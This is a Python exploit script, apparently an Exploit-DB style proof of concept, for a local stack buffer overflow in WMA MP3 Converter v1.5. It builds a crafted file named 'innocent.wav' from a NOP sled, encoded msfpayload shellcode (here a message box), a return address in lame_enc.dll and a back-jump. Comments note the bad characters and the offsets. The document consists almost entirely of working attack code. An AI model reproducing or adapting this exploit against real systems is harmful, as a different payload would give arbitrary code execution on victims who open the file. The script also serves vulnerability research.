WMA MP3 Converter v1.5 (.wav) Local BOF

 

 

 

 

 

 

 

 

#!/usr/bin/python -w

###################################################################################
# Exploit: WMA MP3 Converter v1.5 (.wav) Local BOF                                #
# OS: Only tested on Win7 SP1 PRO (lame_enc.dll might be subject to rebase)       #
# Author: b33f (Ruben Boonen)                                                     #
# Software: http://www.newsoftware.us/free-wma-mp3-converter/download/pages-2.html#
#---------------------------------------------------------------------------------#
# This is a improved rework of Julien Ahrens POC using a different                #
# technique to gain more space and enumerate the actual badchar list              #
# which is 2 characters not 7.                                                    #
###################################################################################

filename="innocent.wav"
                                                                                                                         
###############################################################################
# msfpayload windows/messagebox TEXT='Who uses *.wav anyway!!' TITLE='b33f' R|#
# msfencode -b '\x00\x0A' -t c                                                #
# => size 297                                                                 #
###############################################################################
msgbox = (
"\xd9\xeb\xd9\x74\x24\xf4\x58\xbd\xf1\xd4\x41\xc7\x33\xc9\xb1"
"\x44\x83\xe8\xfc\x31\x68\x15\x03\x68\x15\x13\x21\x98\x2c\x48"
"\x13\x6f\x97\x9a\x95\x42\x65\x15\xe7\xab\xee\x52\x76\x1c\x64"
"\x12\x75\xd7\x0c\xc6\x0e\xa1\xf8\x7d\x6e\x0e\x72\xb7\xb7\x01"
"\x9c\xc2\x34\xc4\x9d\xfd\x44\x16\xfd\x76\xd6\xfd\xda\x03\x62"
"\xc2\xa9\x47\x45\x42\xaf\x8d\x1e\xf8\xb7\xda\x7b\xdd\xc6\x37"
"\x98\x29\x80\x4c\x6b\xd9\x13\xbc\xa5\x22\x22\x80\x3a\x70\xc1"
"\xc0\xb7\x8e\x0b\x0f\x3a\x90\x4c\x64\xb1\xa9\x2e\x5e\x12\xbb"
"\x2f\x15\x38\x67\xb1\xc2\xdb\xec\xbd\x5f\xaf\xa9\xa1\x5e\x44"
"\xc6\xde\xeb\x9b\x31\x57\xaf\xbf\xdd\x09\xec\x72\xd5\xe0\x26"
"\xfb\x03\x7b\x04\x94\x45\x32\x86\x89\x08\x23\x09\xae\x52\x4c"
"\xbc\x14\xa9\x08\xc0\x4e\x53\x1d\xbb\x73\xb0\xb0\x2b\x05\x47"
"\xcb\x54\x93\xfd\x3c\xc2\xc8\x91\x1c\x53\x79\x59\x6f\x7d\x1d"
"\xf5\xfa\xf2\xb8\x77\x8d\xa8\x66\x72\x04\xb6\x31\x7d\x43\x32"
"\x37\x43\x3c\x81\xef\xe6\xf0\x49\x68\xfa\x2e\xe3\x9f\x62\xd0"
"\xfc\x9f\x0d\x76\x22\x40\xee\xee\x40\xb3\xdd\x88\xb5\x68\xa9"
"\x09\x91\x8a\x23\x52\xb1\xeb\x12\xb4\x19\x64\x3b\xcf\xee\x15"
"\xab\x4e\x66\xf6\x4a\xf9\xa6\xdc\xa2\x8e\xce\x55\xc8\x15\x7d"
"\xfe\x79\xbe\xee\xde\xb4\xf7\x78\x52\x93\x10\xf1\x8a\xea\xcc"
"\x53\x1e\x5c\xa3\xac\x70\x6f\x83\x02\x8e\xc5\x0b")

###############################################################################
# (*) Badchars => \x00\x0A                                                    #
# (1) 0x100138be : push esp #  ret => lame_enc.dll                            #
# (2) We tag on a single NOP because the application doesn't make a clean jmp #
#     to ESP, there is a '\x30' which would otherwhise contaminate our        #
#     following instructions.                                                 #
# (3) Jump back to the beginning of our buffer and to our shellcode           #
###############################################################################

shellcode = "\x90"*10 + msgbox
buffer = shellcode + "\x90"*(4112-len(shellcode)) + "\xBE\x38\x01\x10\x90\xE9\xEC\xEF\xFF\xFF"

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()